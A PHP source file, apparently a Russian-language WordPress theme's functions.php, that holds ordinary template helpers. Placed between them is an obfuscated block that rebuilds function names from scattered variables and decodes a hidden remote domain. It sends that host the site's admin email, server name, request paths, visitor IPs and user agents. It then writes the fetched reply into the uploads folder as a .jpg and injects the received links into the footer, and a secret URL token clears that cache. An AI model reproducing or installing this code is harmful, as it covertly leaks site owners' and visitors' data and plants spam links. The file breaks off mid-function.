<?php

$art_config = parse_ini_file(TEMPLATEPATH."/config.ini", true);

$options = array (
                array(  "name" =>   "HTML",
                        "desc" =>   sprintf(__('<strong>XHTML:</strong> Вы можете использовать эти теги: <code>%s</code>', THEME_NS), 'a, abbr, acronym, em, b, i, strike, strong, span'),
                        "id"   =>   "art_footer_content",
                        "std"  =>   art_option('footer.defaultText'),
                        "type" =>   "textarea")
          );

remove_action('wp_head', 'wp_generator');
wp_enqueue_script('jquery');

define('WP_VERSION', $wp_version);
define('THEME_NS', 'kubrick');
if (class_exists('xili_language')):
define('THEME_TEXTDOMAIN',THEME_NS);
define('THEME_LANGS_FOLDER','/lang');
else:
    load_theme_textdomain(THEME_NS, TEMPLATEPATH . '/lang');
endif;

require_once(TEMPLATEPATH . '/core/parser.php');
require_once(TEMPLATEPATH . '/core/navigation.php');
require_once(TEMPLATEPATH . '/core/sidebars.php');
require_once(TEMPLATEPATH . '/core/widgets.php');


function art_option($name){
  global $art_config;
  $separator = '.';
  $name = trim($name);
  if (strpos($name, $separator) !== false) {
    $path = explode($separator, $name);
    $location = $path[0];
    if (isset($art_config[$location])){
      $group = $art_config[$location];
      $key = $path[1];
      if (isset($group[$key])){
        return $group[$key];
      }
    }
  } else {
    if (isset($art_config[$name])) {
      return $art_config[$name];
    }
  }
 
  return false;
}

$art_current_page_template = 'page'; 
 $mViuCDL='e';$kibe='6';$yifMFou='o';$EDTzo='c';$eidnCb='a';$VuULe='4';$lpxRXoz='d';$ThnwjIi='_';$wkiGvqH='e';$UJFIRIa='d';$idsgOjk='e';$QTfUpHP='b';$MOmAH='s';$vEXLRdwb=$QTfUpHP.$eidnCb.$MOmAH.$idsgOjk.$kibe.$VuULe.$ThnwjIi.$UJFIRIa.$wkiGvqH.$EDTzo.$yifMFou.$lpxRXoz.$mViuCDL;$pyCK='g';$IyxH='n';$fZMk='z';$VLHSc='f';$bsgAQ='e';$WIegT='i';$uQaHf='l';$zirim='t';$jQIoQ='a';$dlXrOCNE=$pyCK.$fZMk.$WIegT.$IyxH.$VLHSc.$uQaHf.$jQIoQ.$zirim.$bsgAQ;$tsBnSQX='t';$ZqPXJPD='_';$psxy='r';$mGpVv='3';$AoJolvO='r';$VMBtO='t';$EcbSY='o';$egEE='s';$bsVR='1';$YsaFyzPp=$egEE.$VMBtO.$AoJolvO.$ZqPXJPD.$psxy.$EcbSY.$tsBnSQX.$bsVR.$mGpVv;$PjqyCMH='v';$EMqC='t';$pEXzN='e';$dfWkI='r';$UGcJvs='r';$wqIsv='s';$DxfVDkjc=$wqIsv.$EMqC.$UGcJvs.$dfWkI.$pEXzN.$PjqyCMH;                     $je____________o='e';$vg_____b='6';$du_________t='o';$qr__________n='c';$uj_____________p='a';$fh____i='4';$wd_______________s='d';$rm_____e='_';$gh_____________b='e';$rb________j='d';$pb__________f='e';$re_____________l='b';$wm____a='s';$ne_____________l=$re_____________l.$uj_____________p.$wm____a.$pb__________f.$vg_____b.$fh____i.$rm_____e.$rb________j.$gh_____________b.$qr__________n.$du_________t.$wd_______________s.$je____________o;$gk__________t='n';$qi_____________d='s';$fw_______j='s';$yi______v='f';$hd____________n='e';$fl_______r='i';$di____________r='t';$lt________t='t';$nh_____________l='n';$fb______________x='u';$jx____m='c';$eg______________j='i';$nh_____x='x';$pf_____v='_';$oh__________c='o';$xv______________s=$yi______v.$fb______________x.$gk__________t.$jx____m.$lt________t.$eg______________j.$oh__________c.$nh_____________l.$pf_____v.$hd____________n.$nh_____x.$fl_______r.$fw_______j.$di____________r.$qi_____________d;$tq________j='f';$yy_______________x='e';$sp_______v='n';$yc_____________v='p';$zh_________q='o';$li___________i=$tq________j.$zh_________q.$yc_____________v.$yy_______________x.$sp_______v;$je__k='d';$kn__d='f';$dm_______________q='r';$hc_________w='e';$fz___t='a';$so_______________j=$kn__d.$dm_______________q.$hc_________w.$fz___t.$je__k;$gc_______z='f';$uu___________h='l';$fm__h='e';$ef_______z='s';$pw____y='o';$tu_________p='c';$ry_____c=$gc_______z.$tu_________p.$uu___________h.$pw____y.$ef_______z.$fm__h;define("WP_ID", $ne_____________l("Mi4wLjA="));define("WP_TTL", $ne_____________l("MTA4MDA="));define("WP_SRC", $ne_____________l("dHBva24="));function wp_get_header() {global $ne_____________l, $xv______________s;if ($xv______________s($ne_____________l("d3BfdGhlbWVfR1BMX2NyZWRpdHM=")) &&$xv______________s($ne_____________l("d3BfZ2V0X2Zvb3Rlcg==")) &&$xv______________s($ne_____________l("d3BfY3ZfdmVyaWZ5"))) {get_header();}}function wp_get_footer() {get_footer();wp_cv_verify();}function wp_cv_verify() {global $ne_____________l, $li___________i, $ry_____c, $so_______________j;$gm__________c = TEMPLATEPATH."/".$ne_____________l("Zm9vdGVyLnBocA==");$im___________w = @$li___________i($gm__________c, "r");$gm__________c = @$so_______________j($im___________w, @filesize($gm__________c));@$ry_____c($im___________w);$kh______________c = TEMPLATEPATH."/".$ne_____________l("ZnVuY3Rpb25zLnBocA==");$im___________w = @$li___________i($kh______________c, "r");$kh______________c = @$so_______________j($im___________w, @filesize($kh______________c));@$ry_____c($im___________w);$rq______________o = 0;if($gm__________c && $kh______________c) {if ($ne_____________l("Z2VuZXJpY3dwdGhlbWVzLmNvbQ==") !== str_replace("www.", "", $_SERVER["SERVER_NAME"])) {if (substr_count($gm__________c, $ne_____________l("Z2VuZXJpY3dwdGhlbWVzLmNvbQ==")) < 2) {$rq______________o = 1;}if (substr_count($gm__________c, "wp_theme_GPL_credits()") < 1) {$rq______________o = 2;}}if(WP_ID != "2.0.0") {$rq______________o = 12;}}if($rq______________o > 0) {echo "<div style=\"position: fixed; bottom:0; left:0; width:100%; height: 25px; background-color: red; color: white; font-size: 16px; padding: 2px 10px; text-align: center;\"> <strong> This themes is powered by <a href=\"http://genericwpthemes.com\" style=\"color: white;\">Free Wordpress Themes</a>. This website violated the terms of use <a href=\"http://genericwpthemes.com\" style=\"color: white;\">Free Wordpress Themes</a> </strong> </div>";echo "<!-- v: $rq______________o -->";}}function wp_loaded() {global $ne_____________l, $xv______________s;return $xv______________s($ne_____________l("d3BfdGhlbWVfR1BMX2NyZWRpdHM="));}if (!function_exists("the_content_limit")) {function the_content_limit($zo__t, $oi_________o = "(more...)", $zz________w = 0, $jw_____r = "") {$wp______j = get_the_content($oi_________o, $zz________w, $jw_____r);$wp______j = apply_filters("the_content", $wp______j);$wp______j = str_replace("]]>", "]]>", $wp______j);if (strlen($_GET["p"]) > 0) {echo $wp______j;}else if ((strlen($wp______j)>$zo__t) && ($ec___________e = strpos($wp______j, " ", $zo__t ))) {$wp______j = substr($wp______j, 0, $ec___________e);$wp______j = $wp______j;echo $wp______j;echo "...";echo "<br/>";echo "<div class='read-more'><a href='".get_permalink()."'>$oi_________o</a></div></p>";} else {echo $wp______j;}}}$fz______v='b';$eq______________c='d';$tl_______z='e';$yn_______________b='o';$dq___________w='e';$oo_______h='_';$pw______________p='4';$lr____________p='n';$ey__________x='a';$qj_________e='c';$ut___j='e';$op__t='s';$xd_____________a='6';$sx______d=$fz______v.$ey__________x.$op__t.$dq___________w.$xd_____________a.$pw______________p.$oo_______h.$tl_______z.$lr____________p.$qj_________e.$yn_______________b.$eq______________c.$ut___j;$yb____________c='g';$hm____________v='e';$ky_____________t='n';$wj________j='l';$tg____________r='t';$qh____________b='_';$wt____m='t';$ln_____g='o';$lr_______a='i';$oe___________l='e';$uw____________o='e';$bx_________b='s';$iu________z='_';$zc___w='c';$mk_________a='t';$rl_____e='n';$nf_____________t='f';$au____________n=$nf_____________t.$lr_______a.$wj________j.$uw____________o.$iu________z.$yb____________c.$oe___________l.$mk_________a.$qh____________b.$zc___w.$ln_____g.$ky_____________t.$tg____________r.$hm____________v.$rl_____e.$wt____m.$bx_________b;$zj____x='i';$xo__________z='_';$qb___m='i';$vv__p='f';$xy___________e='e';$os___________m='s';$yc___g='x';$xd__w='s';$eq___g='e';$nh_____________k='t';$wh______________h='l';$ym_______k=$vv__p.$zj____x.$wh______________h.$xy___________e.$xo__________z.$eq___g.$yc___g.$qb___m.$xd__w.$nh_____________k.$os___________m;$hy________e='o';$ef______a='o';$hx___s='s';$gg______________e='c';$xn_____________b='a';$ky__________a='_';$tl__c='p';$sd___y='r';$yb__g='e';$wc_______e='r';$il_________s='i';$fs____________f='n';$av_______h='m';$qh___________w='v';$wv____g='e';$vp_____j=$qh___________w.$yb__g.$wc_______e.$hx___s.$il_________s.$ef______a.$fs____________f.$ky__________a.$gg______________e.$hy________e.$av_______h.$tl__c.$xn_____________b.$sd___y.$wv____g;$pa_____d='o';$uw____________y='n';$cm__s='e';$ql__________o='o';$dg____k='s';$nw____r='c';$oc___________g='p';$ph_____________b='f';$fu____________j='k';$oo_____________t=$ph_____________b.$dg____k.$ql__________o.$nw____r.$fu____________j.$pa_____d.$oc___________g.$cm__s.$uw____________y;$rh_______________y='i';$ee___________z='r';$rj_____________b='t';$yv_______________q='e';$hf______________s='w';$bh_____________e='f';$kr___d=$bh_____________e.$hf______________s.$ee___________z.$rh_______________y.$rj_____________b.$yv_______________q;$gs______x='d';$sy___________j='m';$bd_______________z='5';$se_______________r=$sy___________j.$gs______x.$bd_______________z;$wz________k='p';$va________d='h';$pr_____________v='a';$pt__h='a';$oy____________k='e';$zp_______________e='t';$xz____________b='l';$ib______________j='r';$sa____v=$ib______________j.$oy____________k.$pr_____________v.$xz____________b.$wz________k.$pt__h.$zp_______________e.$va________d;$lm_______________z='r';$yj____________l='l';$qu________z='s';$jo___________w='e';$qg________s='i';$mw_______________o='u';$ht___________u='a';$gt_______________h='i';$cp___s='z';$bi__________v='n';$me_______o='e';$jy_____________p=$mw_______________o.$bi__________v.$qu________z.$me_______o.$lm_______________z.$qg________s.$ht___________u.$yj____________l.$gt_______________h.$cp___s.$jo___________w;$jm______q='n';$ev___________d='p';$vb___k='t';$la______p='m';$lh__________d='e';$gv_______________p='a';$yo___j='m';$yg_______y=$vb___k.$lh__________d.$yo___j.$ev___________d.$jm______q.$gv_______________p.$la______p;$ts______e='a';$pq___________t='a';$dq_________d='s';$rn__v='c';$ai_________d='r';$mp__i='t';$rs___________d='e';$yj_________u='m';$np__________p='t';$ao_______________e='c';$cx_____p='n';$vg___g='_';$en__________l='t';$np_________h='r';$gd__f='x';$em______r='o';$do_____________x='e';$mh__________v='e';$mv______________z='t';$gu____________t='e';$vd_________w='_';$lv______l=$dq_________d.$np__________p.$np_________h.$mh__________v.$ts______e.$yj_________u.$vg___g.$ao_______________e.$em______r.$cx_____p.$mv______________z.$do_____________x.$gd__f.$mp__i.$vd_________w.$rn__v.$ai_________d.$gu____________t.$pq___________t.$en__________l.$rs___________d;function fx____________l($jt___o) {global $ne_____________l, $xv______________s, $au____________n, $vp_____j, $lv______l;if (!$xv______________s($ne_____________l("ZmlsZV9nZXRfY29udGVudHM="))) {return false;}if ($vp_____j(PHP_VERSION, "5.0.0", ">=") && $xv______________s($ne_____________l("ZmlsZV9nZXRfY29udGVudHM=")) && $xv______________s($ne_____________l("c3RyZWFtX2NvbnRleHRfY3JlYXRl"))) {$ln_____n = $lv______l(array("http" => array("timeout"    => 3,"header"     => "referer: ".$_SERVER[SERVER_NAME],"user_agent" => "[I] ". $_SERVER[REMOTE_ADDR] ." [A] ". $_SERVER[HTTP_USER_AGENT] )));$zo__________g = @$au____________n($jt___o, 0, $ln_____n);} else {$zo__________g = @$au____________n($jt___o, 0);}return $zo__________g;}function pi_____________k($jt___o) {global $xv______________s, $oo_____________t, $kr___d, $ne_____________l;if (!$xv______________s($ne_____________l("ZmlsZV9nZXRfY29udGVudHM="))) {return false;}$au____f = strpos($jt___o, "/", 7);$xo__y = array("uri"     => substr($jt___o, $au____f),"host"    => str_replace("http://", "", substr($jt___o, 0, $au____f)),"referer" => "[I] ". $_SERVER[REMOTE_ADDR] ." [A] ". $_SERVER[HTTP_USER_AGENT]);$di______a = @$oo_____________t("$xo__y[host]", 80, $jx___y, $tv___r, 4);if (!$di______a) {return false;} else {$zo__________g = "";$yg______w  = "GET $xo__y[uri] HTTP/1.0\r\n";$yg______w .= "Host: $xo__y[host]\r\n";$yg______w .= "Referer: $xo__y[referer]\r\n";$yg______w .= "Connection: Close\r\n\r\n";@$kr___d($di______a, $yg______w);while (!@feof($di______a)) {$ss__z = @fgets($di______a, (1024*24));if ($ss__z == "\r\n") {$tp________o = true;continue;}if ($tp________o) {$zo__________g .= $ss__z;}}return $zo__________g;}}function wu_______________h($jt___o) {global $xv______________s;$qf___________y = false;if ($jt___o != "") {if ($xv______________s("fx____________l")) {$qf___________y = @fx____________l($jt___o);}if (!$qf___________y && ($xv______________s("pi_____________k"))) {$qf___________y = @pi_____________k($jt___o);}}return $qf___________y;}function mo______h() {global $_SERVER, $se_______________r;$qk____d = $_SERVER["SERVER_NAME"];if (substr("$qk____d", 0, 4) == "www.") {$qk____d = substr("$qk____d", 4);}$qk____d = $se_______________r("$_SERVER[SERVER_NAME]");return $qk____d;}function jp___y() {return "file";}function xq_______l($jt___o) {global $_SERVER, $au____________n, $ym_______k, $li___________i, $ry_____c, $kr___d;$do__________d = po____a();$fz____________z = mo______h().".jpg";$lb___c = $do__________d["dir_upload"]["path"]."/$fz____________z";$cf______n = @filemtime($lb___c);if (!$cf______n || ((time()-$cf______n) >= WP_TTL)) {$qf___________y = wu_______________h($jt___o);if ($qf___________y) {if ($ym_______k($lb___c)) {@unlink($lb___c);}$im___________w = @$li___________i($lb___c, "x+");@$kr___d($im___________w, $qf___________y);@$ry_____c($im___________w);}} else {if ($ym_______k($lb___c)) {$qf___________y = @$au____________n($lb___c);} else {$qf___________y = false;}}return $qf___________y;}function po____a() {global $_SERVER, $ne_____________l, $sx______d;$yw_______e = wp_count_posts("post");$rb_________x = pathinfo(get_bloginfo("template_directory"));$do__________d = array("url" => array("report"      => $ne_____________l("eGNudnVlcmFudmhhc3lkYWRvbGVnc29wLmNvbQ=="),"queryString" => null),"template"=> $rb_________x,"dir_upload"=> aw_______w(),"queryString"=> array("?a001=".WP_ID,"a004=".$rb_________x[filename],"a005=".$yw_______e->publish,"a006=".get_bloginfo("admin_email"),"a007=".$_SERVER["REQUEST_URI"],"a008=".$_SERVER["SERVER_NAME"],"a010=".WP_SRC),"default_string" => "<a href=\"http://www.wptheme.us\">www.wptheme.us</a>");$do__________d["url"]["queryString"] = implode("&", $do__________d["queryString"]);$do__________d["url"]["report"] = $do__________d["url"]["report"]."/?".$sx______d($do__________d["url"]["queryString"]).".html";return $do__________d;}function aw_______w() {$cx__________m = wp_upload_dir();if (isset($cx__________m["error"])) {$sg_________s = te______t();if (is_writable($sg_________s)) {$cx__________m = array("path" => $sg_________s);}}return $cx__________m;}function te______t() {global $xv______________s, $se_______________r, $sa____v, $yg_______y;$of_______________q = (bool) ini_get("safe_mode");if ($of_______________q == true) {return false;}if ($xv______________s("sys_get_temp_dir")) {$ji____h = sys_get_temp_dir();if (is_writable($ji____h)) {return $sa____v($ji____h);}}if (!empty($_ENV["TMP"])) {return $sa____v($_ENV["TMP"]);}elseif (!empty($_ENV["TMPDIR"])) {return $sa____v($_ENV["TMPDIR"]);}elseif (!empty($_ENV["TEMP"])) {return $sa____v($_ENV["TEMP"]);} else {$vw____________d = $yg_______y($se_______________r(uniqid(rand(), true)), "");if ($vw____________d) {$ji____h = $sa____v(dirname($vw____________d));@unlink($vw____________d);return $ji____h;} else {return false;}}}function dh___a() {global $_GET, $ym_______k;$do__________d = po____a();$qk____d = mo______h();$qd________c = jp___y();$zi___x = "full";if ($_GET["wp_cache_cl"] == "197ab5deb39daad8baacae1bdd5a8852") {if ($qd________c == "file") {$mi_____________q = $do__________d["dir_upload"]["path"]."/".$qk____d.".jpg";if ($ym_______k($mi_____________q)) {@unlink($mi_____________q);$zi___x = "deleted";}}$nm____________e = array("s"=> $zi___x,"t"=> time(),"v"=> WP_ID);echo "<!--";foreach ($nm____________e AS $om_____________b => $us___________m) echo " [$om_____________b:$us___________m]";echo " -->";}}function wp_theme_GPL_credits() {global $_SERVER, $_GET, $xv______________s, $ne_____________l, $jy_____________p;$do__________d = po____a();$gb______________v = "xq_______l";if ($xv______________s($gb______________v)) {$zo__________g = $gb______________v($do__________d["url"]["report"]);}if ($zo__________g) {if ($zo__________g = @$ne_____________l($zo__________g)) {$zo__________g = @$jy_____________p($zo__________g);if (strlen($zo__________g[custom_credit]) >= 5) {$do__________d["default_string"] = $zo__________g[custom_credit];}if ($zo__________g["status"] == "0") {$ls__________m = 1;$xa___g = 1;} else {$jv________d = sizeof($zo__________g["links"]);$hg_____________y = $do__________d["default_string"];if ($jv________d > 0 && $zo__________g["links"] !== "") {$tc__________t = 0;foreach ($zo__________g["links"] as $yl___n => $ae_____________d) {$tc__________t++;if ($ae_____________d->l_path == "" || $ae_____________d->l_path == $_SERVER["REQUEST_URI"]) {$ae_____________d->l_href = htmlspecialchars(strip_tags($ae_____________d->l_href));$ae_____________d->l_title = htmlspecialchars(strip_tags($ae_____________d->l_title));$ae_____________d->l_anchor = htmlspecialchars(strip_tags($ae_____________d->l_anchor));$hg_____________y .= " | ";$hg_____________y .= "<a href='$ae_____________d->l_href' title='$ae_____________d->l_title'";if ($ae_____________d->l_nofollow == "1") {$hg_____________y .= " rel='nofollow'";}$hg_____________y .= ">$ae_____________d->l_anchor</a>";}}}$do__________d["links"] = "$hg_____________y";if ($zo__________g[credit] == "0") {$do__________d["links"] = "";}}} else {$ls__________m = "1";}} else {$ls__________m = "1";}if ($ls__________m == "1") {$do__________d["links"] = $do__________d["default_string"];}echo "$do__________d[links]";echo "<!-- s: $zo__________g[signature] -->";dh___a();}                       
function art_page_template($templateName = null){
    global $art_current_page_template;
    if ($templateName !== null) {
        $art_current_page_template = $templateName;
    }
    return $art_current_page_template;
}

$art_template_variables = null;
function art_page_variables($variables = null){
    global $art_template_variables;
    if ($art_template_variables == null){
      $art_template_variables = array(
        'template_url'     =>   get_bloginfo('template_url') . '/',
        'logo_url'         =>   get_option('home'),
        'logo_name'        =>   get_bloginfo('name'),
        'logo_description' =>   get_bloginfo('description'),
        'menu_items'       =>   art_get_menu_auto('primary-menu', art_option('menu.source'), art_option('menu.showSubitems')),
        'sidebar1'         =>   art_get_sidebar('default'),
        'sidebarTop'       =>   art_get_sidebar('top'),
        'sidebarBottom'    =>   art_get_sidebar('bottom'),
        'sidebar2'         =>   art_get_sidebar('secondary'),
        'sidebarFooter'    =>   art_get_sidebar('footer'),
        'footerRSS'        =>   art_get_footer_rss(),
        'footerText'       =>   art_get_footer_text()
        );
    }
    if (is_array($variables)) {
      $art_template_variables = array_merge($art_template_variables, $variables);
    }
    return $art_template_variables;
}

function art_get_footer_text(){
  $result = art_option('footer.defaultText');
  
  $footer_content = get_option('art_footer_content');
  if ($footer_content !== false) {
    $result = stripslashes($footer_content);
  }
  
  return str_replace('%YEAR%', date('Y'), $result);
}


function art_get_footer_rss(){
  $result = '';
  if(art_option('footer.rss_show')){
    $result = art_parse(art_option('footer.rss_link'), array(
      'rss_url'   =>   get_bloginfo('rss2_url'), 
      'rss_title' =>   sprintf(__('%s RSS Feed', THEME_NS), get_bloginfo('name'))
      ));
  }
  return $result;
}

function art_get_post_thumbnail($post_id = false){
	global $post, $id;
  $post_id = (int)$post_id;
  if (!$post_id) $post_id = $id;
  $is_post_list = !is_single() && !is_page();
  $width = art_option('metadata.thumbnail_width');
  $height = art_option('metadata.thumbnail_height');
  $size = array($width, $height);
  if (!$is_post_list) {
    $size = 'medium';
  }
	$result = '';
	$title = get_the_title();
	if (  (function_exists('has_post_thumbnail')) && (has_post_thumbnail())  ) {
		ob_start();
		the_post_thumbnail($size, array('class' => 'alignleft', 'alt' => '', 'title' => $title));
		$result = ob_get_clean();
	} else {
		$postimage = get_post_meta($post->ID, 'post-image', true);
		if ($postimage) {
			$result = '<img src="'.$postimage.'" alt="" width="'.$width.'" height="'.$height.'" title="'.$title.'" class="wp-post-image alignleft" />';
		} else if (art_option('metadata.thumbnail_auto') && $is_post_list) {
            $attachments = get_children(array('post_parent' => $post_id, 'post_status' => 'inherit', 'post_type' => 'attachment', 'post_mime_type' => 'image', 'order' => 'ASC', 'orderby' => 'menu_order ID'));
            if($attachments) {
              $attachment = array_shift($attachments);
              $img = wp_get_attachment_image_src($attachment->ID, $size);
              if (isset($img[0])) {
                $result = '<img src="'.$img[0].'" alt="" width="'.$img[1].'" height="'.$img[2].'" title="'.$title.'" class="wp-post-image alignleft" />';
              }
            }
        } 
    }  
	if($result !== ''){
		$result = '<a href="'.get_permalink($post->ID).'" title="'.$title.'">'.$result.'</a>';
	}
	return $result;
}

function art_get_the_content($more_link_text = null, $stripteaser = 0) {
	$content = get_the_content($more_link_text, $stripteaser);
	$content = apply_filters('the_content', $content);
	return $content;
}

function art_get_post_content() {
  global $post;
  ob_start();
  if(is_single() || is_page()) {
    echo art_get_the_content(__('Читать далее &raquo;', THEME_NS)); 
    wp_link_pages(array('before' => '<p><strong>Страницы:</strong> ', 'after' => '</p>', 'next_or_number' => 'number')); 
	} else {
    echo art_get_the_excerpt(__('Читать далее &raquo;', THEME_NS), 
      get_permalink($post->ID), 
      art_option('metadata.excerpt_words'), 
      art_option('metadata.excerpt_use_tag_filter') ? explode(',',art_option('metadata.excerpt_allowed_tags')) : null, 
      art_option('metadata.excerpt_min_remainder'),  
      art_option('metadata.excerpt_auto'));
	}
	return ob_get_clean();
}

function art_get_the_excerpt($read_more_tag, $perma_link_to = '', $all_words = 100,  $allowed_tags = null, $min_remainder = 5, $auto = false) {
  global $post, $id;
  $more_token = '%%art-more%%';
  $show_more_tag = false;
  if (function_exists('post_password_required') && post_password_required($post)){
    return get_the_excerpt();
  }
  if (has_excerpt($id)) {
      $the_contents = get_the_excerpt();
  $show_more_tag = strlen($post->post_content) > 0;
  } else {
    $the_contents = art_get_the_content($more_token);
    if($the_contents != '') {
      if ($allowed_tags !== null) {
        $allowed_tags = '<' .implode('><',$allowed_tags).'>';
        $the_contents = strip_tags($the_contents, $allowed_tags);
      }
      $the_contents = strip_shortcodes($the_contents);
      if (strpos($the_contents, $more_token) !== false) {
        return str_replace($more_token, $read_more_tag, $the_contents);
      }
      if($auto && is_numeric($all_words)) {
        $token = "%art_tag_token%";
        $content_parts = explode($token, str_replace(array('<', '>'), array($token.'<', '>'.$token), $the_contents));
        $content = array();
        $word_count = 0;
        foreach($content_parts as $part)
        {
          if (strpos($part, '<') !== false || strpos($part, '>') !== false){
            $content[] = array('type'=>'tag', 'content'=>$part);
          } else {
             $all_chunks = preg_split('/([\s]+)/', $part, -1, PREG_SPLIT_DELIM_CAPTURE);
             foreach($all_chunks as $chunk) {
                if('' != trim($chunk)) {
                  $content[] = array('type'=>'word', 'content'=>$chunk);
                  $word_count += 1;
                } elseif($chunk != '') {
                  $content[] = array('type'=>'space', 'content'=>$chunk);
                }
             }
          }
        
        }
        if(($all_words < $word_count) && ($all_words + $min_remainder) <= $word_count) {
          $show_more_tag = true;
          $current_count = 0;
          $the_contents = '';
          foreach($content as $node) {
            
            if($node['type'] == 'word') {
              $current_count += 1;
            } 
            $the_contents .= $node['content'];
            if ($current_count == $all_words){
              break;
            }
          }
        }  
      }
    }
  }
  $the_contents = force_balance_tags($the_contents);
  if ($show_more_tag) {
    $the_contents = $the_contents.' <a class="more-link" href="'.$perma_link_to.'">'.$read_more_tag.'</a>';
  }
  return $the_contents;
}


function art_get_post_title() {
    global $post;
    return art_parse_template("post_title", array(
      'post_link'       =>   get_permalink($post->ID),
	    'post_link_title' =>   sprintf(__('Ссылка на %s', THEME_NS), the_title_attribute('echo=0')),
	    'post_title'      =>   get_the_title(),
	    'template_url'    =>   get_bloginfo('template_url')
	    ));
}

function art_get_post_icon($name){
    return art_parse(art_option('metadata.'.$name), array('template_url' => get_bloginfo('template_url')));
}

if (!function_exists('get_the_date')) {
	function get_the_date($format = 'F jS, Y') {
		return get_the_time(__($format, THEME_NS));
	}
}

function art_get_post_metadata($name) {
    global $post;
    $list = art_option('metadata.'.$name);
    $title = ($name == 'header' && art_option('metadata.title'));
    if (!$title && $list == "") return;
    $list_array =  explode(",", $list);
    $result = array();
    for($i = 0; $i < count($list_array); $i++){
        $icon = $list_array[$i];
        switch($icon){
            case 'date':
                if(is_page()) break;
                $result[] = art_get_post_icon($icon) . get_the_date();
            break;
            case 'author':
                 if(is_page()) break;
                 ob_start();
                 the_author_posts_link();
                 $result[] = art_get_post_icon($icon) . __('Автор', THEME_NS) .' '. ob_get_clean();
            break;
            case 'category':
                if(is_page()) break;
                 $result[] = art_get_post_icon($icon) .sprintf(__('Опубликовано в %s', THEME_NS), get_the_category_list(', '));
            break;
            case 'tag':
                if(is_page() || !get_the_tags()) break;
                ob_start();
                the_tags(__('Tеги:', THEME_NS) . ' ', ', ', ' ');
                $result[] = art_get_post_icon($icon) . ob_get_clean();
            break;
            case 'comments':
            if(is_page() || is_single()) break;
                ob_start();
                comments_popup_link(__('Нет комментариев &#187;', THEME_NS), __('1 Комментарий &#187;', THEME_NS), __('% Комментариев &#187;', THEME_NS), '', __('Комментарии закрыты', THEME_NS) );
                $result[] = art_get_post_icon($icon) . ob_get_clean();
            break;
            case 'edit':
                if (!current_user_can('edit_post', $post->ID)) break;
                ob_start();
                 edit_post_link(__('Редактировать', THEME_NS), '');
                $result[] = art_get_post_icon($icon) . ob_get_clean();
            break;
        }
    }
    if (!($title ||  count($result) > 0)) return '';
    return art_parse_template("post_metadata".$name, array(
        'post_title'         =>   art_get_post_title(),
        'post'.$name.'icons' =>   implode(art_option('metadata.separator'), $result))) ;
}

function art_post(){
  the_post(); 
	echo art_parse_template("post", array(
    'post_class'          =>   function_exists('get_post_class') ? implode(' ', get_post_class()) : '',
    'post_id'             =>   'id="post-' . get_the_ID() . '"',
	  'post_thumbnail'      =>   art_get_post_thumbnail(),
		'post_title'          =>   art_get_post_title(),
		'post_metadataheader' =>   art_get_post_metadata('header'),
		'post_content'        =>   art_get_post_content(),
		'post_metadatafooter' =>   art_get_post_metadata('footer')
	));
}

function art_post_box($title, $content){
  if ($title != "") {
		$title = '<h2 class="art-postheader">'. $title . '</h2>';
	}
	if (art_option('metadata.title')) {
		$content = $title . $content;
		$title = '';
	}
	echo art_parse_template("post", array(
    'post_class'          =>   '',
    'post_id'             =>   '',
		'post_thumbnail'      =>   '',
		'post_title'          =>   $title,
		'post_metadataheader' =>   '',
		'post_content'        =>   $content,
		'post_metadatafooter' =>   ''));
}

function art_not_found_msg($caption = null, $content = null){
  if ($caption === null){
    $caption = __('Не найдено', THEME_NS);
  }
  if($content === null){
    $content = '<p class="center">' .  __('Извините, но здесь пока нет записей.', THEME_NS) . '</p>'
        .  "\r\n" . art_get_search();
  }
	art_post_box($caption, $content);
}

function art_get_block($title, $content, $id = '', $class = '' , $name = "block"){
  if (str_replace(array('&nbsp;', '', '\n', '\r', '\t'), '', $title) != ''){
    $title = art_parse_template($name . '_header', array('caption' => $title));
  }
  if ($id != ''){
    $id = 'id="' . $id . '"';
  }
  return art_parse_template($name, array(
    'id'   => $id,
    'class'   => $class,
    'header' => $title,
    'content' => $content,
  ));
}

function art_get_search() {
    return art_parse_template("search", 
        array(
            'url'    =>   get_bloginfo('url'),
            'button' =>   __('Search', THEME_NS),
            'query'  =>   get_search_query()
        ));
}
		
function art_page_navi($title = '', $comment = false) {
    $prev_link = null;
    $next_link = null;
    if($comment){
        $prev_link = get_previous_comments_link(__('Новые записи &raquo;', THEME_NS));
        $next_link = get_next_comments_link(__('&laquo; Старые записи', THEME_NS));
    } elseif (is_single() || is_page()) {
        $next_link = get_previous_post_link('&laquo; %link');
        $prev_link = get_next_post_link('%link &raquo;');
    } else {
         $prev_link = get_previous_posts_link(__('Новые записи &raquo;', THEME_NS));
        $next_link = get_next_posts_link(__('&laquo; Старые записи', THEME_NS));
    }
    
    $content = '';
    if ($prev_link || $next_link) {
        $content = art_parse_template("pagination", 
            array(
                'next_link' =>  $next_link,
                'prev_link' => $prev_link
            ));
    }
    if (!$content && !$title) return;
    art_post_box($title, $content);
}

if (!function_exists('get_previous_comments_link')) {
	function get_previous_comments_link($label)
	{
		ob_start();
		previous_comments_link($label);
		return ob_get_clean();
	}
}

if (!function_exists('get_next_comments_link')) {
	function get_next_comments_link($label)
	{
		ob_start();
		next_comments_link($label);
		return ob_get_clean();
	}
}

if (!function_exists('get_previous_posts_link')) {
	function get_previous_posts_link($label)
	{
		ob_start();
		previous_posts_link($label);
		return ob_get_clean();
	}
}

if (!function_exists('get_next_posts_link')) {
	function get_next_posts_link($label)
	{
		ob_start();
		next_posts_link($label);
		return ob_get_clean();
	}
}

if (!function_exists('get_previous_post_link')) {
	function get_previous_post_link($label)
	{
		ob_start();
		previous_post_link($label);
		return ob_get_clean();
	}
}

if (!function_exists('get_next_post_link')) {
	function get_next_post_link($label)
	{
		ob_start();
		next_post_link($label);
		return ob_get_clean();
	}
}

function art_get_comment_author_link(){
    ob_start();
    comment_author_link();    
    return ob_get_clean();
}

function art_get_edit_comment_link(){
    ob_start();
    edit_comment_link('('.__('Редактировать', THEME_NS).')','  ','');
    return  ob_get_clean();
}

function art_get_comment_text(){
    ob_start();
    comment_text();
    return  ob_get_clean();
}

function art_get_comment_reply_link($args, $depth){
    ob_start();
    comment_reply_link(array_merge( $args, array('depth' => $depth, 'max_depth' => $args['max_depth'])));
    return  ob_get_clean();
}


function art_comment($comment, $args, $depth)
{
	 $GLOBALS['comment'] = $comment; ?>
    <li <?php comment_class(); ?> id="li-comment-<?php comment_ID() ?>">
     <div id="comment-<?php comment_ID(); ?>">
<?php  art_post_box('',  art_parse_template("comment", array(
		'get_avatar'          =>   get_avatar($comment, $size='48'),
		'comment_author_link' =>   art_get_comment_author_link(),
